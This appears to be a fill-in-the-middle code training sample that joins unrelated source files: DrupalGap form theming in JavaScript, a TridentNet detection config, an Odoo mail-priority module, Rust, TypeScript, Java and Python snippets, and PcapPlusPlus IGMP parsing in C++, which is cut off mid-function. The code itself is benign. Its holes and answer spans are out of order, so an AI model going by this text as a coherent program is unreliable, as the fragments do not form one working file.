function theme_form_required_marker(variables) {
return '*';
}
/**
* Themes a number input.
* @param {Object} variables
* @return {String}
*/
function theme_number(variables) {
try {
variables.attributes.type = 'number';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_number - ' + error); }
}
/**
* Themes a hidden input.
* @param {Object} variables
* @return {String}
*/
function theme_hidden(variables) {
try {
variables.attributes.type = 'hidden';
if (!variables.attributes.value && variables.value != null) {
variables.attributes.value = variables.value;
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_hidden - ' + error); }
}
/**
* Themes a password input.
* @param {Object} variables
* @return {String}
*/
function theme_password(variables) {
try {
variables.attributes.type = 'password';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_password - ' + error); }
}
/**
* Themes radio buttons.
* @param {Object} variables
* @return {String}
*/
function theme_radios(variables) {
try {
var radios = '';
if (variables.options) {
variables.attributes.type = 'radio';
// Determine an id prefix to use.
var id = 'radio';
if (variables.attributes.id) {
id = variables.attributes.id;
delete variables.attributes.id;
}
// Set the radio name equal to the id if one doesn't exist.
if (!variables.attributes.name) {
variables.attributes.name = id;
}
// Init a delta value so each radio button can have a unique id.
var delta = 0;
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip the attributes.
var checked = '';
if (variables.value && variables.value == value) {
checked = ' checked="checked" ';
}
var input_id = id + '_' + delta.toString();
var input_label =
'<label for="' + input_id + '">' + label + '</label>';
radios += '<input id="' + input_id + '" value="' + value + '" ' +
drupalgap_attributes(variables.attributes) +
checked + ' />' + input_label;
delta++;
}
}
return radios;
}
catch (error) { console.log('theme_radios - ' + error); }
}
/**
* Themes a range input.
* @param {Object} variables
* @return {String}
*/
function theme_range(variables) {
try {
variables.attributes.type = 'range';
if (typeof variables.attributes.value === 'undefined') {
variables.attributes.value = variables.value;
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_range - ' + error); }
}
/**
* Themes a search input.
* @param {Object} variables
* @return {String}
*/
function theme_search(variables) {
try {
variables.attributes.type = 'search';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_search - ' + error); }
}
/**
* Themes a select list input.
* @param {Object} variables
* @return {String}
*/
function theme_select(variables) {
try {
var options = '';
if (variables.options) {
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip the attributes.
// Is the option selected?
var selected = '';
if (typeof variables.value !== 'undefined') {
if (
($.isArray(variables.value) && in_array(value, variables.value)) ||
variables.value == value
) { selected = ' selected '; }
}
// Render the option.
options += '<option value="' + value + '" ' + selected + '>' +
label +
'</option>';
}
}
return '<select ' + drupalgap_attributes(variables.attributes) + '>' +
options +
'</select>';
}
catch (error) { console.log('theme_select - ' + error); }
}
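/**
 * Illustrative input for theme('select', ...), inferred from the code above
 * (assumed shape, not official API docs):
 *   {
 *     attributes: { id: 'my-select', name: 'my_select' },
 *     options: { 0: 'Zero', 1: 'One' },
 *     value: 1
 *   }
 * renders a <select id="my-select" name="my_select"> with two options and
 * "One" pre-selected.
 */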
/**
* Themes a telephone input.
* @param {Object} variables
* @return {String}
*/
function theme_tel(variables) {
try {
variables.attributes['type'] = 'tel';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_tel - ' + error); }
}
/**
* Themes a text input.
* @param {Object} variables
* @return {String}
*/
function theme_textfield(variables) {
try {
variables.attributes.type = 'text';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_textfield - ' + error); }
}
/**
* Themes a textarea input.
* @param {Object} variables
* @return {String}
*/
function theme_textarea(variables) {
try {
var output =
'<div><textarea ' + drupalgap_attributes(variables.attributes) + '>' +
variables.value +
'</textarea></div>';
return output;
}
catch (error) { console.log('theme_textarea - ' + error); }
}<|fim▁end|> | function theme_checkbox(variables) {
try {
variables.attributes.type = 'checkbox';
// Check the box? |
<|file_name|>tridentnet_r152v1bc4_c5_2x.py<|end_file_name|><|fim▁begin|>from models.tridentnet.builder import TridentFasterRcnn as Detector
from models.tridentnet.builder_v2 import TridentResNetV1bC4 as Backbone
from models.tridentnet.builder import TridentRpnHead as RpnHead
from models.tridentnet.builder import process_branch_outputs, process_branch_rpn_outputs
from symbol.builder import Neck
from symbol.builder import RoiAlign as RoiExtractor
from symbol.builder import BboxC5V1Head as BboxHead
from mxnext.complicate import normalizer_factory
def get_config(is_train):
class General:
log_frequency = 10
name = __name__.rsplit("/")[-1].rsplit(".")[-1]
batch_image = 1 if is_train else 1
fp16 = False
class Trident:
num_branch = 3
train_scaleaware = True
test_scaleaware = True
branch_ids = range(num_branch)
branch_dilates = [1, 2, 3]
valid_ranges = [(0, 90), (30, 160), (90, -1)]
valid_ranges_on_origin = True
branch_bn_shared = True
branch_conv_shared = True
branch_deform = False
assert num_branch == len(branch_ids)
assert num_branch == len(valid_ranges)
class KvstoreParam:
kvstore = "local"
batch_image = General.batch_image
gpus = [0, 1, 2, 3, 4, 5, 6, 7]
fp16 = General.fp16
class NormalizeParam:
# normalizer = normalizer_factory(type="syncbn", ndev=len(KvstoreParam.gpus))
normalizer = normalizer_factory(type="fixbn")
class BackboneParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
depth = 152
num_branch = Trident.num_branch
branch_ids = Trident.branch_ids
branch_dilates = Trident.branch_dilates
branch_bn_shared = Trident.branch_bn_shared
branch_conv_shared = Trident.branch_conv_shared
branch_deform = Trident.branch_deform
class NeckParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
class RpnParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
batch_image = General.batch_image * Trident.num_branch
class anchor_generate:
scale = (2, 4, 8, 16, 32)
ratio = (0.5, 1.0, 2.0)
stride = 16
image_anchor = 256
class head:
conv_channel = 512
mean = (0, 0, 0, 0)
std = (1, 1, 1, 1)
class proposal:
pre_nms_top_n = 12000 if is_train else 6000
post_nms_top_n = 500 if is_train else 300
nms_thr = 0.7
min_bbox_side = 0
class subsample_proposal:
proposal_wo_gt = True
image_roi = 128
fg_fraction = 0.5
fg_thr = 0.5
bg_thr_hi = 0.5
bg_thr_lo = 0.0
class bbox_target:
num_reg_class = 2
class_agnostic = True
weight = (1.0, 1.0, 1.0, 1.0)
mean = (0.0, 0.0, 0.0, 0.0)
std = (0.1, 0.1, 0.2, 0.2)
class BboxParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
num_class = 1 + 80
image_roi = 128
batch_image = General.batch_image * Trident.num_branch
class regress_target:
class_agnostic = True
mean = (0.0, 0.0, 0.0, 0.0)
std = (0.1, 0.1, 0.2, 0.2)
class RoiParam:
fp16 = General.fp16
normalizer = NormalizeParam.normalizer
out_size = 7
stride = 16
class DatasetParam:
if is_train:
image_set = ("coco_train2017", )
else:
image_set = ("coco_val2017", )
backbone = Backbone(BackboneParam)
neck = Neck(NeckParam)
rpn_head = RpnHead(RpnParam)
roi_extractor = RoiExtractor(RoiParam)
bbox_head = BboxHead(BboxParam)
detector = Detector()
if is_train:
train_sym = detector.get_train_symbol(
backbone, neck, rpn_head, roi_extractor, bbox_head,
num_branch=Trident.num_branch, scaleaware=Trident.train_scaleaware)
rpn_test_sym = None
test_sym = None
else:
train_sym = None
rpn_test_sym = detector.get_rpn_test_symbol(backbone, neck, rpn_head, Trident.num_branch)
test_sym = detector.get_test_symbol(
backbone, neck, rpn_head, roi_extractor, bbox_head, num_branch=Trident.num_branch)
class ModelParam:
train_symbol = train_sym
test_symbol = test_sym
rpn_test_symbol = rpn_test_sym
from_scratch = False
random = True
memonger = False
memonger_until = "stage3_unit21_plus"
class pretrain:
prefix = "pretrain_model/resnet%s_v1b" % BackboneParam.depth
epoch = 0
fixed_param = ["conv0", "stage1", "gamma", "beta"]
class OptimizeParam:
class optimizer:
type = "sgd"
lr = 0.01 / 8 * len(KvstoreParam.gpus) * KvstoreParam.batch_image
momentum = 0.9
wd = 0.0001
clip_gradient = 5
class schedule:
begin_epoch = 0
end_epoch = 12
lr_iter = [120000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image),
160000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)]
class warmup:
type = "gradual"
lr = 0.0
iter = 3000 * 16 // (len(KvstoreParam.gpus) * KvstoreParam.batch_image)
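# Worked out for illustration: with the defaults above (8 GPUs x 1 image per
# GPU, i.e. a divisor of 8), lr resolves to 0.01, lr_iter to [240000, 320000],
# and the warmup runs for 6000 iterations.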
class TestParam:
min_det_score = 0.001
max_det_per_image = 100
process_roidb = lambda x: x
if Trident.test_scaleaware:
process_output = lambda x, y: process_branch_outputs(
x, Trident.num_branch, Trident.valid_ranges, Trident.valid_ranges_on_origin)
else:
process_output = lambda x, y: x
process_rpn_output = lambda x, y: process_branch_rpn_outputs(x, Trident.num_branch)
class model:
prefix = "experiments/{}/checkpoint".format(General.name)
epoch = OptimizeParam.schedule.end_epoch
class nms:
type = "nms"
thr = 0.5
class coco:
annotation = "data/coco/annotations/instances_minival2014.json"
# data processing
class NormParam:
mean = tuple(i * 255 for i in (0.485, 0.456, 0.406)) # RGB order
std = tuple(i * 255 for i in (0.229, 0.224, 0.225))
class ResizeParam:
short = 800
long = 1200 if is_train else 2000
class PadParam:
short = 800
long = 1200 if is_train else 2000
max_num_gt = 100
class ScaleRange:
valid_ranges = Trident.valid_ranges
cal_on_origin = Trident.valid_ranges_on_origin # True: valid_ranges are measured on the original image scale; False: on the resized image scale
class AnchorTarget2DParam:
class generate:<|fim▁hole|> aspects = (0.5, 1.0, 2.0)
class assign:
allowed_border = 0
pos_thr = 0.7
neg_thr = 0.3
min_pos_thr = 0.0
class sample:
image_anchor = 256
pos_fraction = 0.5
class trident:
invalid_anchor_threshd = 0.3
class RenameParam:
mapping = dict(image="data")
from core.detection_input import ReadRoiRecord, Resize2DImageBbox, \
ConvertImageFromHwcToChw, Flip2DImageBbox, Pad2DImageBbox, \
RenameRecord, Norm2DImage
from models.tridentnet.input import ScaleAwareRange, TridentAnchorTarget2D
if is_train:
transform = [
ReadRoiRecord(None),
Norm2DImage(NormParam),
Resize2DImageBbox(ResizeParam),
Flip2DImageBbox(),
Pad2DImageBbox(PadParam),
ConvertImageFromHwcToChw(),
ScaleAwareRange(ScaleRange),
TridentAnchorTarget2D(AnchorTarget2DParam),
RenameRecord(RenameParam.mapping)
]
data_name = ["data", "im_info", "gt_bbox"]
if Trident.train_scaleaware:
data_name.append("valid_ranges")
label_name = ["rpn_cls_label", "rpn_reg_target", "rpn_reg_weight"]
else:
transform = [
ReadRoiRecord(None),
Norm2DImage(NormParam),
Resize2DImageBbox(ResizeParam),
ConvertImageFromHwcToChw(),
RenameRecord(RenameParam.mapping)
]
data_name = ["data", "im_info", "im_id", "rec_id"]
label_name = []
import core.detection_metric as metric
rpn_acc_metric = metric.AccWithIgnore(
"RpnAcc",
["rpn_cls_loss_output"],
["rpn_cls_label"]
)
rpn_l1_metric = metric.L1(
"RpnL1",
["rpn_reg_loss_output"],
["rpn_cls_label"]
)
# for bbox, the label is generated in network so it is an output
box_acc_metric = metric.AccWithIgnore(
"RcnnAcc",
["bbox_cls_loss_output", "bbox_label_blockgrad_output"],
[]
)
box_l1_metric = metric.L1(
"RcnnL1",
["bbox_reg_loss_output", "bbox_label_blockgrad_output"],
[]
)
metric_list = [rpn_acc_metric, rpn_l1_metric, box_acc_metric, box_l1_metric]
return General, KvstoreParam, RpnParam, RoiParam, BboxParam, DatasetParam, \
ModelParam, OptimizeParam, TestParam, \
transform, data_name, label_name, metric_list<|fim▁end|> | short = 800 // 16
long = 1200 // 16
stride = 16
scales = (2, 4, 8, 16, 32) |
<|file_name|>mail_compose_message.py<|end_file_name|><|fim▁begin|># Copyright 2018 ACSONE SA/NV
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import ast
from odoo import api, exceptions, models, _
class MailComposeMessage(models.TransientModel):
_inherit = 'mail.compose.message'
@api.model
def _get_priorities(self):
"""
Load priorities from parameters.
:return: dict
"""
key = 'mail.sending.job.priorities'
try:
priorities = ast.literal_eval(<|fim▁hole|> # Catch exception to have a understandable error message
except (ValueError, SyntaxError):
raise exceptions.UserError(
_("Error to load the system parameter (%s) "
"of priorities") % key)
# literal_eval accepts any Python literal, so check that we
# actually got a dict
if not isinstance(priorities, dict):
raise exceptions.UserError(
_("Error to load the system parameter (%s) of priorities.\n"
"Invalid dictionary") % key)
return priorities
@api.multi
def send_mail(self, auto_commit=False):
"""
Set a priority on subsequent generated mail.mail, using priorities
set in the configuration.
:return: dict/action
"""
active_ids = self.env.context.get('active_ids')
default_priority = self.env.context.get('default_mail_job_priority')
if active_ids and not default_priority:
priorities = self._get_priorities()
size = len(active_ids)
limits = [lim for lim in priorities if lim <= size]
if limits:
prio = priorities.get(max(limits))
self = self.with_context(default_mail_job_priority=prio)
return super().send_mail(auto_commit=auto_commit)<|fim▁end|> | self.env['ir.config_parameter'].sudo().get_param(
key, default='{}')) |
<|file_name|>status.rs<|end_file_name|><|fim▁begin|>use bytes::Bytes;
use crate::HeaderValue;
pub const STATUS_200: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"200")) };
pub const STATUS_404: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"404")) };
pub const STATUS_500: HeaderValue =
unsafe { HeaderValue::from_bytes_unchecked(Bytes::from_static(b"500")) };
pub fn status_to_header_value(code: u32) -> HeaderValue {<|fim▁hole|> 200 => STATUS_200,
404 => STATUS_404,
500 => STATUS_500,
s => HeaderValue::from_bytes(Bytes::from(format!("{}", s)))
.map_err(|(_, e)| e)
.unwrap(),
}
}<|fim▁end|> | match code { |
<|file_name|>RevealableBlock.ts<|end_file_name|><|fim▁begin|>import { Renderer } from '../Rendering/Renderer'
import { Heading } from './Heading'
import { RichOutlineSyntaxNode } from './RichOutlineSyntaxNode'
export class RevealableBlock extends RichOutlineSyntaxNode {
render(renderer: Renderer): string {<|fim▁hole|> // table of contents.
descendantsToIncludeInTableOfContents(): Heading[] {
return []
}
protected readonly REVEALABLE_BLOCK = undefined
}<|fim▁end|> | return renderer.revealableBlock(this)
}
// As a rule, we don't want to include any revealable (i.e. initially hidden) headings in the |
<|file_name|>Uniques.java<|end_file_name|><|fim▁begin|>/**
* Copyright (C) 2006-2020 Talend Inc. - www.talend.com
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.talend.sdk.component.api.configuration.constraint;
import static java.lang.annotation.ElementType.FIELD;<|fim▁hole|>import static java.lang.annotation.ElementType.PARAMETER;
import static java.lang.annotation.RetentionPolicy.RUNTIME;
import java.lang.annotation.Retention;
import java.lang.annotation.Target;
import java.util.Collection;
import org.talend.sdk.component.api.configuration.constraint.meta.Validation;
import org.talend.sdk.component.api.meta.Documentation;
@Validation(expectedTypes = Collection.class, name = "uniqueItems")
@Target({ FIELD, PARAMETER })
@Retention(RUNTIME)
@Documentation("Ensure the elements of the collection must be distinct (kind of set).")
public @interface Uniques {
}<|fim▁end|> | |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>"""
__init__.py
ist303-miye
Copyright (C) 2017
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2 of the License, or (at your option) any later<|fim▁hole|>ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program; if not, write to the Free Software Foundation, Inc., 59 Temple
Place, Suite 330, Boston, MA 02111-1307 USA
"""
from .cwebview import *<|fim▁end|> | version.
This program is distributed in the hope that it will be useful, but WITHOUT |
<|file_name|>IgmpLayer.cpp<|end_file_name|><|fim▁begin|>#define LOG_MODULE PacketLogModuleIgmpLayer
#include "IgmpLayer.h"
#include "PacketUtils.h"
#include "Logger.h"
#include <string.h>
#include "EndianPortable.h"
namespace pcpp
{
/*************
* IgmpLayer
*************/
IgmpLayer::IgmpLayer(IgmpType type, const IPv4Address& groupAddr, uint8_t maxResponseTime, ProtocolType igmpVer)
{
m_DataLen = getHeaderSizeByVerAndType(igmpVer, type);
m_Data = new uint8_t[m_DataLen];
memset(m_Data, 0, m_DataLen);
m_Protocol = igmpVer;
setType(type);
if (groupAddr.isValid())
setGroupAddress(groupAddr);
getIgmpHeader()->maxResponseTime = maxResponseTime;
}
void IgmpLayer::setGroupAddress(const IPv4Address& groupAddr)
{
igmp_header* hdr = getIgmpHeader();
hdr->groupAddress = groupAddr.toInt();
}
IgmpType IgmpLayer::getType() const
{
uint8_t type = getIgmpHeader()->type;
if (type < (uint8_t)IgmpType_MembershipQuery ||
(type > (uint8_t)IgmpType_LeaveGroup && type < (uint8_t)IgmpType_MulticastTracerouteResponse) ||
(type > (uint8_t)IgmpType_MulticastTraceroute && type < (uint8_t)IgmpType_MembershipReportV3) ||
(type > (uint8_t)IgmpType_MembershipReportV3 && type < (uint8_t)IgmpType_MulticastRouterAdvertisement) ||
type > IgmpType_MulticastRouterTermination)
return IgmpType_Unknown;
return (IgmpType)type;
}
void IgmpLayer::setType(IgmpType type)
{
if (type == IgmpType_Unknown)
return;
igmp_header* hdr = getIgmpHeader();
hdr->type = type;
}
ProtocolType IgmpLayer::getIGMPVerFromData(uint8_t* data, size_t dataLen, bool& isQuery)
{
isQuery = false;
if (dataLen < 8 || data == NULL)
return UnknownProtocol;
switch ((int)data[0])
{
case IgmpType_MembershipReportV2:
case IgmpType_LeaveGroup:
return IGMPv2;
case IgmpType_MembershipReportV1:
return IGMPv1;
case IgmpType_MembershipReportV3:
return IGMPv3;
case IgmpType_MembershipQuery:
{
isQuery = true;
if (dataLen >= sizeof(igmpv3_query_header))
return IGMPv3;
if (data[1] == 0)
return IGMPv1;
else
return IGMPv2;
}
default:
return UnknownProtocol;
}
}
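// Illustrative caller sketch (assumed usage, not part of this file):
//   bool isQuery;
//   ProtocolType ver = IgmpLayer::getIGMPVerFromData(payload, payloadLen, isQuery);
//   if (ver == IGMPv3 && isQuery) { /* parse payload as an IGMPv3 query */ }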
uint16_t IgmpLayer::calculateChecksum()
{
ScalarBuffer<uint16_t> buffer;
buffer.buffer = (uint16_t*)getIgmpHeader();
buffer.len = getHeaderLen();
return computeChecksum(&buffer, 1);
}
size_t IgmpLayer::getHeaderSizeByVerAndType(ProtocolType igmpVer, IgmpType igmpType) const
{
if (igmpVer == IGMPv1 || igmpVer == IGMPv2)
return sizeof(igmp_header);
if (igmpVer == IGMPv3)
{
if (igmpType == IgmpType_MembershipQuery)
return sizeof(igmpv3_query_header);
else if (igmpType == IgmpType_MembershipReportV3)
return sizeof(igmpv3_report_header);
}
return 0;
}
std::string IgmpLayer::toString() const
{
std::string igmpVer = "";
switch (getProtocol())
{
case IGMPv1:
igmpVer = "1";
break;
case IGMPv2:
igmpVer = "2";
break;
default:
igmpVer = "3";
}
std::string msgType;
switch (getType())
{
case IgmpType_MembershipQuery:
msgType = "Membership Query";
break;
case IgmpType_MembershipReportV1:
msgType = "Membership Report";
break;
case IgmpType_DVMRP:
msgType = "DVMRP";
break;
case IgmpType_P1Mv1:
msgType = "PIMv1";
break;
case IgmpType_CiscoTrace:
msgType = "Cisco Trace";
break;
case IgmpType_MembershipReportV2:
msgType = "Membership Report";
break;
case IgmpType_LeaveGroup:
msgType = "Leave Group";
break;
<|fim▁hole|> case IgmpType_MulticastTraceroute:
msgType = "Multicast Traceroute";
break;
case IgmpType_MembershipReportV3:
msgType = "Membership Report";
break;
case IgmpType_MulticastRouterAdvertisement:
msgType = "Multicast Router Advertisement";
break;
case IgmpType_MulticastRouterSolicitation:
msgType = "Multicast Router Solicitation";
break;
case IgmpType_MulticastRouterTermination:
msgType = "Multicast Router Termination";
break;
default:
msgType = "Unknown";
break;
}
std::string result = "IGMPv" + igmpVer + " Layer, " + msgType + " message";
return result;
}
/*************
* IgmpV1Layer
*************/
void IgmpV1Layer::computeCalculateFields()
{
igmp_header* hdr = getIgmpHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
hdr->maxResponseTime = 0;
}
/*************
* IgmpV2Layer
*************/
void IgmpV2Layer::computeCalculateFields()
{
igmp_header* hdr = getIgmpHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
/******************
* IgmpV3QueryLayer
******************/
IgmpV3QueryLayer::IgmpV3QueryLayer(uint8_t* data, size_t dataLen, Layer* prevLayer, Packet* packet) :
IgmpLayer(data, dataLen, prevLayer, packet, IGMPv3)
{
}
IgmpV3QueryLayer::IgmpV3QueryLayer(const IPv4Address& multicastAddr, uint8_t maxResponseTime, uint8_t s_qrv) :
IgmpLayer(IgmpType_MembershipQuery, multicastAddr, maxResponseTime, IGMPv3)
{
getIgmpV3QueryHeader()->s_qrv = s_qrv;
}
uint16_t IgmpV3QueryLayer::getSourceAddressCount() const
{
return be16toh(getIgmpV3QueryHeader()->numOfSources);
}
IPv4Address IgmpV3QueryLayer::getSourceAddressAtIndex(int index) const
{
uint16_t numOfSources = getSourceAddressCount();
if (index < 0 || index >= numOfSources)
return IPv4Address();
// verify numOfRecords is a reasonable number that points to data within the packet
int ptrOffset = index * sizeof(uint32_t) + sizeof(igmpv3_query_header);
if (ptrOffset + sizeof(uint32_t) > getDataLen())
return IPv4Address();
uint8_t* ptr = m_Data + ptrOffset;
return IPv4Address(*(uint32_t*)ptr);
}
size_t IgmpV3QueryLayer::getHeaderLen() const
{
uint16_t numOfSources = getSourceAddressCount();
int headerLen = numOfSources * sizeof(uint32_t) + sizeof(igmpv3_query_header);
// verify numOfRecords is a reasonable number that points to data within the packet
if ((size_t)headerLen > getDataLen())
return getDataLen();
return (size_t)headerLen;
}
void IgmpV3QueryLayer::computeCalculateFields()
{
igmpv3_query_header* hdr = getIgmpV3QueryHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
bool IgmpV3QueryLayer::addSourceAddress(const IPv4Address& addr)
{
return addSourceAddressAtIndex(addr, getSourceAddressCount());
}
bool IgmpV3QueryLayer::addSourceAddressAtIndex(const IPv4Address& addr, int index)
{
uint16_t sourceAddrCount = getSourceAddressCount();
if (index < 0 || index > (int)sourceAddrCount)
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", index is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_query_header) + index * sizeof(uint32_t);
if (offset > getHeaderLen())
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", index is out of packet bounds");
return false;
}
if (!extendLayer(offset, sizeof(uint32_t)))
{
PCPP_LOG_ERROR("Cannot add source address at index " << index << ", didn't manage to extend layer");
return false;
}
memcpy(m_Data + offset, addr.toBytes(), sizeof(uint32_t));
getIgmpV3QueryHeader()->numOfSources = htobe16(sourceAddrCount+1);
return true;
}
bool IgmpV3QueryLayer::removeSourceAddressAtIndex(int index)
{
uint16_t sourceAddrCount = getSourceAddressCount();
if (index < 0 || index > (int)sourceAddrCount-1)
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", index is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_query_header) + index * sizeof(uint32_t);
if (offset >= getHeaderLen())
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", index is out of packet bounds");
return false;
}
if (!shortenLayer(offset, sizeof(uint32_t)))
{
PCPP_LOG_ERROR("Cannot remove source address at index " << index << ", didn't manage to shorten layer");
return false;
}
getIgmpV3QueryHeader()->numOfSources = htobe16(sourceAddrCount-1);
return true;
}
bool IgmpV3QueryLayer::removeAllSourceAddresses()
{
size_t offset = sizeof(igmpv3_query_header);
size_t numOfBytesToShorted = getHeaderLen() - offset;
if (!shortenLayer(offset, numOfBytesToShorted))
{
PCPP_LOG_ERROR("Cannot remove all source addresses, didn't manage to shorten layer");
return false;
}
getIgmpV3QueryHeader()->numOfSources = 0;
return true;
}
/*******************
* IgmpV3ReportLayer
*******************/
uint16_t IgmpV3ReportLayer::getGroupRecordCount() const
{
return be16toh(getReportHeader()->numOfGroupRecords);
}
igmpv3_group_record* IgmpV3ReportLayer::getFirstGroupRecord() const
{
// check if there are group records at all
if (getHeaderLen() <= sizeof(igmpv3_report_header))
return NULL;
uint8_t* curGroupPtr = m_Data + sizeof(igmpv3_report_header);
return (igmpv3_group_record*)curGroupPtr;
}
igmpv3_group_record* IgmpV3ReportLayer::getNextGroupRecord(igmpv3_group_record* groupRecord) const
{
if (groupRecord == NULL)
return NULL;
// prev group was the last group
if ((uint8_t*)groupRecord + groupRecord->getRecordLen() - m_Data >= (int)getHeaderLen())
return NULL;
igmpv3_group_record* nextGroup = (igmpv3_group_record*)((uint8_t*)groupRecord + groupRecord->getRecordLen());
return nextGroup;
}
void IgmpV3ReportLayer::computeCalculateFields()
{
igmpv3_report_header* hdr = getReportHeader();
hdr->checksum = 0;
hdr->checksum = htobe16(calculateChecksum());
}
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecordAt(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses, int offset)
{
if (offset > (int)getHeaderLen())
{
PCPP_LOG_ERROR("Cannot add group record, offset is out of layer bounds");
return NULL;
}
size_t groupRecordSize = sizeof(igmpv3_group_record) + sizeof(uint32_t)*sourceAddresses.size();
if (!extendLayer(offset, groupRecordSize))
{
PCPP_LOG_ERROR("Cannot add group record, cannot extend layer");
return NULL;
}
uint8_t* groupRecordBuffer = new uint8_t[groupRecordSize];
memset(groupRecordBuffer, 0, groupRecordSize);
igmpv3_group_record* newGroupRecord = (igmpv3_group_record*)groupRecordBuffer;
newGroupRecord->multicastAddress = multicastAddress.toInt();
newGroupRecord->recordType = recordType;
newGroupRecord->auxDataLen = 0;
newGroupRecord->numOfSources = htobe16(sourceAddresses.size());
int srcAddrOffset = 0;
for (std::vector<IPv4Address>::const_iterator iter = sourceAddresses.begin(); iter != sourceAddresses.end(); iter++)
{
memcpy(newGroupRecord->sourceAddresses + srcAddrOffset, iter->toBytes(), sizeof(uint32_t));
srcAddrOffset += sizeof(uint32_t);
}
memcpy(m_Data + offset, groupRecordBuffer, groupRecordSize);
delete[] groupRecordBuffer;
getReportHeader()->numOfGroupRecords = htobe16(getGroupRecordCount() + 1);
return (igmpv3_group_record*)(m_Data + offset);
}
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecord(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses)
{
return addGroupRecordAt(recordType, multicastAddress, sourceAddresses, (int)getHeaderLen());
}
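// Call-site sketch (illustrative; record type 1 is assumed here to mean
// MODE_IS_INCLUDE):
//   std::vector<IPv4Address> sources;
//   sources.push_back(IPv4Address(std::string("10.0.0.1")));
//   reportLayer.addGroupRecord(1, IPv4Address(std::string("239.1.1.1")), sources);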
igmpv3_group_record* IgmpV3ReportLayer::addGroupRecordAtIndex(uint8_t recordType, const IPv4Address& multicastAddress, const std::vector<IPv4Address>& sourceAddresses, int index)
{
int groupCnt = (int)getGroupRecordCount();
if (index < 0 || index > groupCnt)
{
PCPP_LOG_ERROR("Cannot add group record, index " << index << " out of bounds");
return NULL;
}
size_t offset = sizeof(igmpv3_report_header);
igmpv3_group_record* curRecord = getFirstGroupRecord();
for (int i = 0; i < index; i++)
{
if (curRecord == NULL)
{
PCPP_LOG_ERROR("Cannot add group record, cannot find group record at index " << i);
return NULL;
}
offset += curRecord->getRecordLen();
curRecord = getNextGroupRecord(curRecord);
}
return addGroupRecordAt(recordType, multicastAddress, sourceAddresses, (int)offset);
}
bool IgmpV3ReportLayer::removeGroupRecordAtIndex(int index)
{
int groupCnt = (int)getGroupRecordCount();
if (index < 0 || index >= groupCnt)
{
PCPP_LOG_ERROR("Cannot remove group record, index " << index << " is out of bounds");
return false;
}
size_t offset = sizeof(igmpv3_report_header);
igmpv3_group_record* curRecord = getFirstGroupRecord();
for (int i = 0; i < index; i++)
{
if (curRecord == NULL)
{
PCPP_LOG_ERROR("Cannot remove group record at index " << index << ", cannot find group record at index " << i);
return false;
}
offset += curRecord->getRecordLen();
curRecord = getNextGroupRecord(curRecord);
}
if (!shortenLayer((int)offset, curRecord->getRecordLen()))
{
PCPP_LOG_ERROR("Cannot remove group record at index " << index << ", cannot shorted layer");
return false;
}
getReportHeader()->numOfGroupRecords = htobe16(groupCnt-1);
return true;
}
bool IgmpV3ReportLayer::removeAllGroupRecords()
{
int offset = (int)sizeof(igmpv3_report_header);
if (!shortenLayer(offset, getHeaderLen()-offset))
{
PCPP_LOG_ERROR("Cannot remove all group records, cannot shorted layer");
return false;
}
getReportHeader()->numOfGroupRecords = 0;
return true;
}
/*********************
* igmpv3_group_record
*********************/
uint16_t igmpv3_group_record::getSourceAddressCount() const
{
return be16toh(numOfSources);
}
IPv4Address igmpv3_group_record::getSourceAddressAtIndex(int index) const
{
uint16_t numOfRecords = getSourceAddressCount();
if (index < 0 || index >= numOfRecords)
return IPv4Address();
int offset = index * sizeof(uint32_t);
const uint8_t* ptr = sourceAddresses + offset;
return IPv4Address(*(uint32_t*)ptr);
}
size_t igmpv3_group_record::getRecordLen() const
{
